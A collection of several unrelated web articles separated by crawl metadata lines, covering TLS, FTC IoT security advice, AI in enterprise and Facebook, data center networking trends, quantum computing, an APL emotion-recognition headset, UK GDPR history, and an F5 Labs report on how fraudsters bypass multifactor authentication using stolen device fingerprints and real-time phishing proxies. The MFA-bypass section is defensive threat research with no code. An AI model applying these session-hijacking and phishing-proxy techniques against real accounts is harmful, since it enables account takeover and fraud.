As the name implies, Transport Layer Security is a protocol that gets implemented on the transport layer of a network to encrypt data transmitted via HTTP, FTP, XMPP, etc. TLS is typically implemented in conjunction with protocols like Transmission Control Protocol (TCP), which prioritizes accuracy over speed. However, in some cases it can be used with connection less protocols like User Datagram Protocol (UDP) - then using a slight variant called DTLS.
IPSec vs. OpenVPN: What’s the Difference?
The more distributed your devices or employees are, and the more valuable your data, the more critical it is that your data transmissions are encrypted and secure. You want your devices and users to have access to network resources without leaving the door open to hackers. | <urn:uuid:6723dda4-dbdd-450d-aea4-7fbadfd65b33> | CC-MAIN-2024-38 | https://www.emnify.com/iot-glossary/internet-breakout | 2024-09-15T15:42:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651632.84/warc/CC-MAIN-20240915152239-20240915182239-00028.warc.gz | en | 0.9203 | 1,171 | 2.984375 | 3 |
IoT security and privacy best practices
In a report on the Internet of Things (IoT), the staff of the Federal Trade Commission recommend a series of concrete steps that businesses can take to enhance and protect consumers’ privacy and security, as Americans start to reap the benefits from a growing world of Internet-connected devices.
The IoT is already impacting the daily lives of millions of Americans through the adoption of health and fitness monitors, home security devices, connected cars and household appliances, among other applications. Such devices offer the potential for improved health-monitoring, safer highways, and more efficient home energy use, among other potential benefits. However, the FTC report also notes that connected devices raise numerous privacy and security concerns that could undermine consumer confidence.
The IoT universe is expanding quickly, and there are now over 25 billion connected devices in use worldwide, with that number set to rise significantly as consumer goods companies, auto manufacturers, healthcare providers, and other businesses continue to invest in connected devices, according to data cited in the report.
Security was one of the main topics addressed at the workshop and in the comments, particularly due to the highly networked nature of the devices. The report includes the following recommendations for companies developing Internet of Things devices:
- build security into devices at the outset, rather than as an afterthought in the design process
- train employees about the importance of security, and ensure that security is managed at an appropriate level in the organization
- ensure that when outside service providers are hired, that those providers are capable of maintaining reasonable security, and provide reasonable oversight of the providers
- when a security risk is identified, consider a “defense-in-depth” strategy whereby multiple layers of security may be used to defend against a particular risk
- consider measures to keep unauthorized users from accessing a consumer’s device, data, or personal information stored on the network
- monitor connected devices throughout their expected life cycle, and where feasible, provide security patches to cover known risks.
Commission staff also recommend that companies consider data minimization – that is, limiting the collection of consumer data, and retaining that information only for a set period of time, and not indefinitely. The report notes that data minimization addresses two key privacy risks: first, the risk that a company with a large store of consumer data will become a more enticing target for data thieves or hackers, and second, that consumer data will be used in ways contrary to consumers’ expectations.
The report takes a flexible approach to data minimization. Under the recommendations, companies can choose to collect no data, data limited to the categories required to provide the service offered by the device, less sensitive data; or choose to de-identify the data collected.
Eve Maler, VP Innovation & Emerging Technology at ForgeRock, comments: “The problem with focusing primarily on security by design is that the overarching fear of IoT security has only a little bit to do with hacking and the physical nature of hacking constrained devices. The bigger fear has more to do with feeling like there is very little power, from an end-user perspective, to control what information is sharable. It’s as though companies are automatically granted access to consumers’ personal data by virtue of their privileged position, vs. consumers controlling the information that is sharable.”
“The rise of distributed services and devices with cloud components only increase consumers’ agitation for more transparency, choice and control. Therefore, the designers of IoT-enabled devices must recognize the solid business value of privacy-respecting features. The most practical way to build in privacy is to use consistent, well-vetted open standards and platforms that enable secure, user-consented connections between devices, services and applications. Once consumers feel that they have control over their information, we will truly see the full potential of connected devices, services and applications,” Maler added. | <urn:uuid:cc1e765e-331f-409f-94ac-0e6b23021508> | CC-MAIN-2024-38 | https://www.helpnetsecurity.com/2015/01/28/iot-security-and-privacy-best-practices/ | 2024-09-16T18:22:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00828.warc.gz | en | 0.943434 | 796 | 2.765625 | 3 |
But AI is now an integral part of many of the technology services which we all use on a daily basis.
And this is possible only because of changes to enterprise technology architecture in the last few years.
Big businesses have for the most part done the work of linking up isolated siloes of data. They’ve created integrated data and storage facilities and built platforms which allow technology like Hadoop to access fluid pools of enterprise data.
The creation of these infrastructures is allowing different kinds of software to emerge.
The results of this are already visible in social networking, online shopping, media and search.
We are already interacting with AI systems dozens of times a day. Not just while we’re online either – if you drove to work this morning even if your car is not self-driving yet you probably shared the road with a car which was at least partly AI driven.
The traffic lights and the buses are likewise already relying on AI to improve service.
Back at your computer autocomplete forms and search requests use some form of AI.
The recommended stories at the end of news pieces are created by, often not very good, AI software.
Likewise online retailers recommended products have moved beyond comparing purchases with other shoppers’ baskets to more targeted suggestions.
AI also plays a big part in the software used to scan and sort product reviews and removing fake, or ‘astroturf’, comments.
But some media companies are using artificial intelligence to actually write stories too. These systems do best with quite structured data sets like weather forecasts and company financial reports but they do a pretty good job of baseball games too.
The stories produced are generally well received by readers although research shows humans still have a slight edge on ‘readability’ compared to the computer generated copy.
The hope is that this won’t just replace reporters but add to what they do by reducing time spent on some of the simple but time consuming tasks.
It also opens up the creation of written records – one start-up is using the technology to create match reports for school and kids’ sports teams based on game data.
Facebook is a relative latecomer to AI but is now racing ahead and attempting to include it in almost all new products.
After using such systems for facial recognition, and for checking log-ins from unexpected places AI is now playing a growing role at the company.
The most widespread use of AI tools has been to improve delivery of sponsored posts or adverts. It uses systems to pre-judge likely interest in adverts it shows to improve relevance and therefore click-through rates. It is even piloting technology to scan user posts to identify people at risk of suicide and suggesting organisations they can contact for help.
When company founder Mark Zuckerberg wrote an open letter to users on the issue of fake news last month he promised that AI would play a big role in making the community safer and content more trustworthy.
In fact the network already uses a serious amount of AI, one leading engineer said it could not function without it.
The network uses intelligent systems to trawl through content, images and video posted by users and highlights content it finds worrying. This system now accounts for over 30 per cent of total complaints received.
Zuckerberg stressed that these systems are still in the early stages and it still faces difficulties. Telling the difference between stories about terrorism and stories promoting terrorism is tricky for a human never mind a machine.
Zuckerberg noted that polarisation of opinion pre-dates social networking and has even had an impact on debates around AI itself.
This means there needs to be an understanding of where AI can and should start and where human decision making is still vital. For Facebook this means humans setting the standard for what content they consider to be objectionable, then letting AI enforce and monitor those rules.
Within the company this research is carried out by Facebook Artificial Intelligence Research. But crucially there is a separate group – Applied Machine Learning group devoted to getting this research into products and persuading engineers to think AI at the earliest stages of design.
Artificial intelligence is on the brink of becoming just another aspect of application development.
There are several cloud-based AI systems for all aspects of enterprise technology from stock control and pricing tools to systems which can gauge social reaction to events and marketing campaigns.
HPE’s cloud offering ‘HavenOnDemand’ offers over 60 applications and sets of APIs for developers to link enterprise systems to intelligent analysis.
Services range from advanced text analysis and file format conversion to systems to make predictions based on past data and recommendations for action.
The system uses a simple browser-based system which allows developers to link two or more of these API sets together to easily link applications to AI services.
There are also templates of common business use cases for data processing or analysis.
This means businesses can bolt together the different stages required.
For instance unbiased machine-based analysis of web surveys called Net Promoter.
The first stage would carry out any re-formatting which was required.
The second step would analyse text to judge sentiment, then index any unstructured text and finally create an actionable answer to each question posed.
These cloud-based AI systems can access data from almost any source within the enterprise. It is hard to think of any sort of enterprise application which won’t be using some form of machine-based intelligence within five years.
But AI is also leaving the data centre. As its demand for computing resources reduces so it is possible to run some AI apps directly on mobile phones and other devices. As implementation becomes ever simpler AI will play more of a role on embedded systems and IoT devices.
As the amount of data we create continues to double each year the role of machine learning and AI will continue to grow.
It is far from perfect, but it is getting better all the time, and it doesn’t suffer from data overload.
Unlike us humans the more data it gets the smarter it becomes. | <urn:uuid:44e5f0ce-a905-462d-b647-552735f79f0a> | CC-MAIN-2024-38 | https://www.techmonitor.ai/leadership/digital-transformation/artificial-intelligence-machine-learning-real-world | 2024-09-18T02:01:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00728.warc.gz | en | 0.956274 | 1,234 | 2.90625 | 3 |
Modern data center networking aims to manage clients with multiple data center workloads. In such a network, servers are the components that provide the necessary services to users (and the programs that run on their behalf).
Responses to API function calls may be the most basic forms of such networking services. Servers can provide applications for users/clients via Web protocols, language platforms, or virtual machines that will provide full desktops to users.
What is a Data Center?
A data center is a facility that centralizes the IT services and resources of an enterprise, as well as where the data is processed, handled and distributed. Data centers store the most critical systems of a network and are essential to streamline day-to-day operations. Therefore, a top priority for organizations is the safety and reliability of data centers and their information.
Although data center designs are different, they can generally be categorized as data centers that are internet-oriented or enterprise-oriented (or “internal”). Internet-facing data centers generally support relatively few applications, are mostly browser-based, and often have undisclosed numbers of users. Enterprise data centers, on the other hand, serve fewer users but host more applications that range from off-the-shelf to custom applications.
What is data center networking?
Currently, on single computers, few business workloads–and increasingly less product and entertainment workloads–are executed, which implies the need for data center networking. Networks provide a common map for servers, users, applications and middleware to position workload execution and also to control access to the data they generate. The workflow that involves data center networking between resources is the organized work between servers and clients in a network.
Data is shared between servers and users, even though there is no central supervisor of such exchanges for modern data centers. A traditional data center network includes servers that handle workloads and respond to client requests. It also includes switches that link devices together; routers that execute packet forwarding functions, controllers that handle workflows between network devices, and gateways which serve as junctions between data center networks and the wider Internet.
Software-Defined Data Center Networking
In a software-defined network (SDN), data center workflow dynamics switch to a more effective accommodation of varying workloads. Essentially, the workflow is divided into two categories: the content of documents and media used by clients (the data plane) and the guidance on how this information should be accommodated by the network (the control plane). It allows an SDN controller to make grand changes to how the data plane is mapped, even while a process is underway.
Processes are executed without compromising the control plane and the connections that link the network components together. Nevertheless, enterprises and public services tend to view their data centers in common use as the collection of servers running on-premises they own or rent. But, even this concept is worn off by new realities, the most popular of which is the proliferation of cloud-based services and applications made available to “as-a-service” companies–offered on a subscription basis, or pay-as-you-go basis.
Data Center Networking Trends
- Network Agility
The networks of today need to be incredibly flexible to meet customers' connectivity needs. It is crucial to the success of any organization to be able to access data and services when they are needed. This applies in particular to businesses that rely on multiple suppliers and platforms to provide their customers with services. Institutions leave themselves open to the severe effects of system downtime without inefficiencies in place to ensure network availability.
- 5G Infrastructure
The 5th-gen technology is finally beginning to roll out in select markets after decades of promises. It has become by far one of the highest-profile trends in data center networking. Telecom carriers already are heavily investing in infrastructure and technologies that will take full advantage of 5G, and any data center that delays in preparing for this trend in the industry may find it difficult to compete. As the reach of 5G networks grows, consumers would expect this innovative technology to provide the lightning-fast service they have been told to expect.
- Edge Computing and IoT
The growing proliferation of devices from the Internet of Things (IoT) has caused many companies to reconsider their network architecture. Since data is limited by physics laws, it takes time for it to travel back and forth to the center of the network, adding latency into the process and weakening device efficiency.
Edge computing architecture that pushes core processing functions nearer to the outer edges of the network where most data is collected and where many users access digital services, enables devices to respond much more quickly based on the data they observe. Whether using neighboring edge data centers to streamline analysis or process information using their internal hardware, using edge computing networks, IoT devices can significantly improve performance.
Click Here For Free Insights: https://www.kbvresearch.com/news/data-center-networking-market/
The bottom line
The data center networking market is significantly taking root. Cloud computing is expected to improve the demand for these technologies through expanded use in various industries over the forecast period. The industry of the data center is in the middle of a massive transformation. Due to the accessibility and availability of the infrastructure for cloud computing and SaaS services, any company can deploy applications and technology with just a few clicks.
It is anticipated that the growing IoT applications will further boost market growth over the coming years. The notion of "center" becomes almost entirely elusive as the essence of data center networking is increasingly disaggregated. Instead of a place where assets are managed and operated, a network of data centers can now be no more substantive than the collection of information technology resources accessible through one another - owned or leased by a business or subscribed to. The Global Data Center Networking Market is projected to surface over the coming years, at a market growth of 12.3% CAGR. | <urn:uuid:e28a0867-54ab-45f3-9321-0a6235733a6f> | CC-MAIN-2024-38 | https://globalriskcommunity.com/profiles/blogs/what-are-the-key-trends-that-run-the-data-center-networking | 2024-09-09T14:33:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00628.warc.gz | en | 0.942095 | 1,213 | 3.140625 | 3 |
Attackers are always on the lookout to compromise digital identities. A successful account takeover allows a cybercriminal to impersonate a genuine user for monetization purposes. Enterprises large and small have utilized various means to secure someone’s digital identity, and credentials are the starting point. F5 Labs 2021 Credential Stuffing Report indicates that 1.8 billion credential sets were spilled in 2020 alone. Such a huge stash of credentials is a massive threat to digital identities. An effective mitigation strategy to this threat that various regulatory bodies and security practitioners recommend is to enforce multifactor authentication (MFA).
MFA, which restricts attackers from capitalizing on the use of compromised credentials, has been on the rise. It requires the user to provide two or more different types of factors. Typically, it’s something the user knows (such as a password) and something the user has. The second factor is usually a code sent via text message, a hardware token, or a dedicated multifactor authentication app. After entering a username and password, the user must enter the code to complete the login. However, it is worth noting that not all authentication systems are created equal, and unsuspecting users can be tricked into providing the second factor. Social engineering is a prevalent way of getting a user the divulge the second factor, but fraudsters have also employed technologically sophisticated ways to bypass MFA. This article evaluates two tricks attackers use to game authentication systems.
Trick 1: Capitalizing on Trusted Sessions
No doubt, the user experience suffers because of MFA. To make this less inconvenient for customers, many websites employ techniques to identify a user device and register the information after the user provides a second authentication factor and consent to trust their device. Once registered, transactions from those devices are deemed safe. For example, an e-commerce website establishes trust with a user device by enforcing MFA on the first logon. It then subsequently allows transactions from this trusted user device, which may include credit card details stored in a user’s profile. This improves the experience for the user, who is not forced to provide a second factor for every transaction. However, any deviation from the user’s stored risk profile, such as a known user logging in from a new device, initiates a multifactor verification.
Typically, once a device is identified, the information is stored in the form of a cookie on the client side, which will be used to identify the device on the server side. A known device is supposedly less risky and does not trigger additional authentication. Fraudsters understand this process, and we have seen a thriving marketplace named Genesis Store that helps enable these bad actors. For example, a fraudster can obtain device fingerprints and associated cookies and credentials with ease, as shown in Figure 1.
An analysis of data collected from January through May 2021 from a leading financial institution showed fraudsters making targeted attacks using Genesis. About 1,500 requests were aimed at either logons or change password requests using a Genesis plugin that spoofed the attacker’s device as the customer’s device. These requests, which produced around 900 unique browser fingerprints, were crafted to trick the financial institution’s antifraud solution and to potentially prevent triggering multifactor authentication that the attacker might not have access to.
Trick 2: Using Real-Time Phishing Proxies
In the 2020 Phishing and Fraud Report, F5 Labs researchers noted a rise in the use of real-time phishing proxies (RTPP). Simply put, RTPP is a different take on phishing. Instead of setting up fake websites, fraudsters use a person-in-the-middle technique that intercepts users’ transactions on the genuine website. Traditional phishing attacks are asynchronous in nature, as the fraudster’s objective is to collect credentials and utilize them at a different time. MFA-enabled accounts are a dampener to these phishing attempts, as they usually rely on time-sensitive tokens that cannot be reused. RTPPs transform phishing from asynchronous to real-time, enabling attackers to capture of MFA codes or the authenticated session cookies. Armed with these, fraudsters can impersonate a genuine user and complete transactions.
F5 Labs, along with Shape Security researchers, analyzed one such campaign targeting a financial institution. In this attack campaign, cybercriminals set up a spoofed domain and lured customers to access it using various phishing techniques. During the four-week period in which F5 studied the active attack campaign, researchers spotted an interesting anomaly about the devices. This threat actor group was limited to real devices and more than 55,000 attempts were made for 4,127 accounts from a single device. The attackers used a few other devices, but the account-to-device ratio was disproportionate. Table 1 shows the account-related details of five unique devices used in this campaign.
Device | Unique IDs | Number of Login Attempts |
1 | 4,127 | 55,312 |
2 | 307 | 1,409 |
3 | 225 | 875 |
4 | 233 | 399 |
5 | 217 | 811 |
Multifactor authentication enhances security for online accounts and makes it more difficult to compromise an account. But it diminishes the user experience, and businesses often design easier paths based on risk assessment. Fraudsters and attackers are on the lookout for these easy paths and employ a range of techniques to bypass MFA controls. This makes it essential to understand the threat landscape and implement MFA accordingly.
- Tie MFA to specific transactions and adopt a risk-based approach
- Analyze affinity of account-to-device and device-to-account to spot anomalies
- Deploy controls to check if an endpoint is trying to spoof its fingerprint.
- Detect automated transactions.
- Train users to treat credentials and MFA codes as confidential. | <urn:uuid:285f7fc5-8d0c-4b18-8a6b-53bc76df6fb0> | CC-MAIN-2024-38 | https://www.f5.com/labs/articles/threat-intelligence/attacker-tricks-for-taking-over-risk-based-multifactor-authentication | 2024-09-09T16:02:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00628.warc.gz | en | 0.934453 | 1,194 | 2.71875 | 3 |
Do you remember when a computer filled an entire room? Not only were they behemoths, they were also slow by today’s standards. Over time, however, the computer became increasingly compact even as its capabilities and speed increased. Today, a device that fits in the palm of a hand can perform sophisticated tasks in the blink of a virtual eye.
Computers are getting smaller and more powerful all the time, as predicted by Moore’s law. That 1965 theory, now an established truism, says computers should double in power every 18 months as transistors shrink, enabling more of them to fit on a processing chip.
Now, though, transistors can be the size of a single atom. Has computer technology hit its limit?
We simply can’t get any smaller, not without going down to the subatomic realm. Doing so brings a new set of challenges: In the tiny universe, the laws of physics differ dramatically from what we experience on the human scale. Atomic particles such as electrons and protons, for instance, can exist in two places at the same time. How do we design reliable, predictable information systems in such an unpredictable environment?
Science leads the way
But technology’s progress marches inexorably on, and scientists today are developing tomorrow’s alternatives to our current, silicon-based computing. Physicists, biologists and others are researching not only computing using subatomic particles — “quantum” computing — but also the use of magnetic waves, DNA and other materials to transmit the 0s and 1s that make up digital information.
Although any of these technologies is a long way from our laptops and phones — the only quantum computer in use fills an entire room — some promise processing speeds and complexities exponentially greater than our computers produce today. Quantum computing, for example, is said to process information more than 100 million times faster than the contemporary PC.
Computing is in its infancy, it seems safe to say — and so, by extension, is cybersecurity. The advent of any of these new systems could obliterate current information-security technologies, even providing data that protects itself. Hacking a silicon-based computer network involves cracking the codes written in binary digits, or “bits,” to access the information stored as all those 1s and 0s. But what if there were no code to crack?
Our ‘rules’ don’t apply
Quantum computing works with information stored not in bits but in “qubits,” using the smallest forms of matter such as electrons or photons. According to the laws of quantum physics, these “qubits” don’t necessarily have an assigned value. They can act as 1s, 0s, something in between — or all of the above, at once. If these slippery laws of subatomic nature challenge physicists, how would hackers work around them?
For example, scientists recently developed a technique for “detangling” photons, which occur in pairs, and isolating them from each other. Although separated, they retain their bonded quality — what affects one, affects the other. Heralded as a major breakthrough, this new technique for generating single protons could lead to quantum computing in which tightly bonded photon pairs transmit and receive information — a process likened to communicating via tin can “telephones.” Because any interception would interrupt the bond — like cutting the string between the cans — both senders and recipients would know instantly when a breach occurred.
DNA computing, which uses strands of DNA to process information and magnetic-wave computing, using “solitons,” or invisible, naturally occurring solitary waves to transmit data, hold promise, too, for faster, more efficient computing that is also more secure.
On the human timeline, the Information Age warrants barely a blip: The World Wide Web, or internet, was introduced in 1991. Information security, too, is new, with large-scale thefts of personal and business data occurring only in recent years. Where it’s headed next seems fairly clear — away from device-centered approaches to ones focused on securing data, no matter where it comes from or where it is going.
Seizing the day for cyber
Until now, cybersecurity has consisted mainly of putting “locks” on existing devices to protect a known universe of things, including, now, the Internet of Things. But with computing technology poised on the brink of momentous change, we in the profession have a unique opportunity to start again, and get security right this time.
We can’t know what tomorrow holds, device-wise, but we do know there will be data — and that’s what we’ve always needed to protect. Keeping that aim in mind may help us transform cybersecurity, from an afterthought “tacked on” to protect a known universe of things, into an essential feature designed for the great, technological unknown.
Whether the next big technology turns out to be quantum, DNA or magnetic-wave computing — or something else — the time is now for the cybersecurity profession to join the conversation. We could be on the ground floor of something big. We would do well to educate ourselves, and to work with scientists, the government and the private sector to ensure that the next generation of computing technology is at least as secure as it fast and effective.
JR Reagan is the global chief information security officer of Deloitte. He also serves as professional faculty at Johns Hopkins, Cornell and Columbia universities. Follow him @IdeaXplorer. Read more from JR Reagan. | <urn:uuid:5caed949-5d2d-42a4-8f38-f275ac9f1d57> | CC-MAIN-2024-38 | https://fedscoop.com/in-cybersecurity-its-physics-to-the-rescue/ | 2024-09-10T21:27:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00528.warc.gz | en | 0.948899 | 1,149 | 3.828125 | 4 |
JHU APL develops mixed reality emotion recognition tech
Researchers at the Johns Hopkins Applied Physics Laboratory (APL) announced on October 25 that they have developed a mixed reality system that improves the ability to detect social signals and emotional displays in real time by amplifying subtle movements of the face and eyes.
The Mixed Reality Social Prosthesis system emphasizes expressions of emotion by overlaying actual psychophysiological data on the face, enabling finer perception of nonverbal cues that are displayed in the course of social interaction.
APL researchers developed the Mixed Reality Social Prosthesis system to sense facial actions, pupil size, blink rate, and gaze direction, and to overlay those signals on the face using the HoloLens, Microsoft’s mixed-reality technology platform. “The result is dramatic accentuation of subtle changes in the face, including changes that people are not usually aware of, like pupil dilation or nostril flare,” said Ariel Greenberg, APL research scientist. The novel system collects facial signals using a range of sensors, synchronizes those signals in real time, registers them in real space, and then overlays those signals on the face of an interaction partner. See a video demonstration of the system in action.
The Mixed Reality Social Prosthesis was initially developed by APL researchers for intelligence interviewers and police officers, who could use the system for detecting deception, and to improve skills in de-escalation and conflict resolution. “It can be difficult in the heat of the moment for people to make accurate assessments of others’ emotional state,” said Greenberg. “The Mixed Reality Social Prosthesis could help train officers to recognize and overcome the impact of stress on perception of emotion.”
There are opportunities to apply the system to areas beyond intelligence and law enforcement. As a health care application, the system could help restore function of patients experiencing social deficits as a result of a traumatic brain injury or cognitive decline, or individuals along the autism spectrum.
The Mixed Reality Social Prosthesis could be adapted for clinicians or caretakers who interact with these specialized populations, to assist in interpreting social signals and emotional displays on an individualized basis. “Individuals with social deficits may express emotions in unfamiliar ways,” added Greenberg. “This system could help attune practitioners to patients’ particular patterns of expression.”
Source: JHU APL | <urn:uuid:1c694a6d-12a4-463c-a4b9-39395d298b43> | CC-MAIN-2024-38 | https://intelligencecommunitynews.com/jhu-apl-develops-mixed-reality-emotion-recognition-tech/ | 2024-09-10T21:53:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00528.warc.gz | en | 0.90899 | 490 | 2.96875 | 3 |
What is the UK GDPR?
The UK General Data Protection Regulation (UK GDPR) is a comprehensive framework governing data protection in the United Kingdom. In the aftermath of Brexit, it was enacted to integrate principles from its European Union predecessor seamlessly. The UK GDPR is tailored to accommodate domestic data operations and those interacting with EU resident. This regulatory milestone not only underscores the UK’s commitment to upholding robust data protection standards but also reflects a dynamic response to the evolving challenges of the post-Brexit era.
The History of Data Protection in the UK
Genesis: Data Protection Act 1984
The roots of data protection laws in the UK can be traced back to the Data Protection Act of 1984. Enacted at a time when personal computers were making their way into households and interconnected networks were in their infancy, this legislation responded to the increasing use of computer systems in processing personal data. The Act addressed concerns about the potential misuse of personal information, especially as technology advanced. It established a framework to regulate the processing of personal data, marking the initial steps toward safeguarding individuals’ privacy rights in the digital age.
Data Protection Act 1995
The Data Protection Act of 1995 represented a significant evolution in response to the growing complexities of data processing. As technology advanced, the need for a more comprehensive and harmonized approach to data protection became apparent. In alignment with the European Data Protection Directive of 1995, the Act sought to standardize data protection practices across EU member states, including the UK. This legislation laid the groundwork for the subsequent Data Protection Act of 1998.
Data Protection Act 1998
The Data Protection Act of 1998 was enacted as a direct response to the increasing challenges posed by the rapid advancement of technology. By 1998, the internet had become a transformative force, and digital data processing had proliferated. The 1995 Act was deemed insufficient to address the complex issues arising from this digital revolution. The Data Protection Act of 1998 not only brought the UK in line with the EU Data Protection Directive but also introduced more robust provisions to regulate the processing of personal data better and protect individuals’ privacy rights. However, as technology continued to outpace the legislation, it became evident that a more comprehensive update was necessary, leading to the subsequent introduction of the GDPR in 2018.
Evolutionary Shift: GDPR
The pivotal moment in this evolution occurred with the advent of the General Data Protection Regulation (GDPR) in the European Union in 2018. As an EU member, the UK automatically embraced the principles of GDPR with the UK DPA 2018, heralding a commitment to harmonized data protection standards across member states.
Post-Brexit Regulatory Independence:
The dynamics changed with the UK’s decision to exit the EU, commonly known as Brexit. As the UK charted its course independent of the EU, a crucial question emerged regarding the future of data protection laws within the country. It became evident that a distinct legal framework was imperative to address the evolving challenges of the digital age while respecting individual privacy rights independent of the EU GDPR. Importantly, the provisions of the EU GDPR are incorporated directly into UK data privacy law as the UK GDPR.
Post-Brexit Landscape: UK GDPR and EU GDPR
With the conclusion of the Brexit transition period on December 30, 2020, the UK GDPR replaced the EU GDPR in the UK. However, organizations in the UK providing goods and services to, or monitoring the behavior of, EU residents continue to operate under the EU GDPR’s jurisdiction. This dual compliance requirement necessitates adherence to both sets of regulations, though their similarities facilitate a relatively straightforward approach with additional measures for international data transfers.
Dual Legal Framework: GDPR and UK GDPR:
The introduction of the UK GDPR created a dual legal framework for data protection in the UK. This dual framework comprises two integral components — the GDPR and the UK General Data Protection Regulation 2018.
Data Protection Reform in the UK
Post-Brexit, the UK government has been actively reforming data protection laws, with the latest development being the Data Protection and Digital Information (No.2) Bill, also known as the DPDI Bill. The bill aims to create a business-friendly and clear framework, maintaining data adequacy with the EU, reducing bureaucratic requirements, and fostering international trade while upholding comprehensive data protection standards.
Objectives of the UK GDPR
Adaptation to Digital Challenges:
The exponential growth of digital technologies presented new challenges to data protection. The GDPR sought to provide a comprehensive and adaptable framework to address these challenges, ensuring that individuals’ personal data remained secure in an increasingly interconnected world.
Safeguarding Individual Privacy Rights:
At its core, the GDPR was designed to safeguard the privacy rights of individuals. Recognizing the value and sensitivity of personal data, the legislation aimed to instill a culture of responsibility among businesses, ensuring that the processing and handling of personal information adhered to ethical and legal standards.
Governance and Compliance
The governance structure established by the GDPR and the UK GDPR reflects a commitment to ensuring the lawful and ethical processing of personal data. Regulatory bodies, such as the Information Commissioner’s Office (ICO), oversee compliance, investigate breaches, and enforce data protection laws. This dual-layered approach allows the UK to balance upholding high data protection standards and tailoring regulations to its unique circumstances.
Impact on Businesses and Individuals
For businesses operating in the UK, the dual legal framework requires careful navigation. While the principles echo those of the GDPR, there are nuanced differences that businesses must understand to ensure compliance. The GDPR, in conjunction with the UK GDPR, establishes guidelines for firms to handle personal data responsibly, fostering an environment where individuals’ privacy rights are respected and protected.
What Does UK GDPR Mean for Businesses?
The UK General Data Protection Regulation enactment signifies a paradigm shift for businesses, necessitating a comprehensive and proactive approach to data protection. The implications extend beyond mere legal compliance, fostering a culture of responsibility and commitment to safeguarding individuals’ privacy rights in an interconnected world.
Proactive Stance Towards Data Protection
Businesses operating within the UK must adopt a proactive stance towards data protection under the UK GDPR. This means going beyond a reactive, compliance-driven mindset and actively integrating robust data protection measures into their operations. This proactive approach acknowledges the dynamic nature of the digital landscape and the evolving threats to personal data security.
Commitment to Privacy Rights
Compliance with the GDPR is not just a legal obligation; it symbolizes a commitment to protecting the privacy rights of individuals. In an era where personal data is a valuable commodity, and cyber threats loom large, businesses are responsible for ensuring that individuals’ personal information is handled with the utmost care and respect.
Series of Obligations on Businesses
The GDPR places a series of obligations on businesses, outlining specific guidelines for processing, storing, and safeguarding personal data. These obligations are designed to create a framework prioritizing transparency, fairness, and security in handling personal information. The obligations encompass various aspects, from data collection to processing and storage, emphasizing a holistic approach to data protection.
For businesses, operationalizing these principles involves integrating them into every facet of their data management practices. From the initial collection of data to its processing, storage, and eventual disposal, each step must align with the ethical and legal standards set by the GDPR.
Data Protection by Design:
The GDPR encourages a “data protection by design” approach, urging businesses to embed privacy considerations into developing products, services, and internal processes. This proactive integration ensures that data protection is not an afterthought but a fundamental aspect of business operations.
By adhering to the principles of the GDPR, businesses can effectively mitigate the risks associated with data breaches, unauthorized access, and non-compliance. Proactive measures, such as conducting data protection impact assessments (DPIAs), enable businesses to identify and address potential risks before they escalate.
Enhanced Trust and Reputation
Compliance with the GDPR goes beyond legal obligations; it enhances trust and reputation. Demonstrating a commitment to protecting individuals’ privacy rights fosters a positive relationship with customers, partners, and stakeholders. In an age where trust is a valuable currency, businesses prioritizing data protection are better positioned in the competitive landscape.
Legal Consequences of Non-Compliance:
Non-compliance with the GDPR can have severe legal consequences, including fines and reputational damage. Businesses failing to adhere to the principles risk regulatory scrutiny and legal action, underlining the importance of a proactive and robust approach to data protection.
The 7 Principles of the UK GDPR:
The GDPR articulates seven fundamental principles that serve as the cornerstone for businesses when processing personal data. These principles are rooted in the GDPR and establish a comprehensive and ethical framework, guiding businesses on the responsible handling of personal information.
- Lawfulness, Fairness, and Transparency
This principle emphasizes organizations’ need to process personal data lawfully, ensuring transparency in their operations. It requires businesses to be open about their data processing practices, promoting fairness and preventing unwarranted harm to individuals.
- Purpose Limitation
Mandating that organizations collect and process personal data for explicit and legitimate purposes, this principle safeguards individuals by ensuring they are informed about the intended use of their information.
- Data Minimization
The principle of Data Minimization underscores the necessity for organizations to limit data collection to what is strictly required for the specified purposes.
Requiring organizations to take reasonable steps to ensure the accuracy of processed personal data, this principle highlights the importance of maintaining precise and up-to-date information.
- Storage Limitation
Dictating that personal data should only be retained for as long as necessary, the Storage Limitation principle prevents unnecessary data retention.
- Integrity and Confidentiality (Security)
This principle demands that organizations implement robust security measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
Necessitating that organizations demonstrate compliance with data protection principles, the Accountability principle emphasizes the importance of maintaining comprehensive records, conducting regular assessments, and actively engaging with data protection processes.
UK DPA vs. GDPR
While the GDPR and the GDPR share common principles, distinctions arise due to the UK’s departure from the EU. Businesses operating in the UK must navigate the dual compliance requirements of the GDPR and the UK GDPR. Understanding these subtle differences is crucial for organizations seeking a comprehensive and robust approach to data protection.
How to Comply with the UK GDPR
Achieving compliance with the GDPR demands a strategic and holistic approach. Businesses should start with a comprehensive data audit, identifying the types of personal data they process and the purposes for which it is used. Robust data protection policies and procedures and employee training are essential to ensure awareness and understanding of compliance obligations.
Data protection impact assessments (DPIAs) are pivotal in compliance efforts, helping organizations identify and mitigate potential risks associated with data processing activities. Additionally, businesses meeting specific criteria must appoint a Data Protection Officer (DPO) to oversee compliance efforts.
Regular reviews and updates of data protection policies are imperative to adapt to evolving legal requirements and technological advancements. Engaging with regulatory authorities and staying informed about developments in data protection legislation is also essential for businesses striving to maintain compliance.
The evolution of the GDPR and the UK GDPR reflects a proactive approach to the challenges of the digital age. As technology advances and the digital landscape evolves, these regulations provide a foundation for adapting to new realities while maintaining a steadfast commitment to data protection. The dual legal framework positions the UK as a jurisdiction that respects international standards and tailors its approach to citizens’ needs and priorities.
Looking Ahead: Data Protection and Digital Information (No. 2) Bill
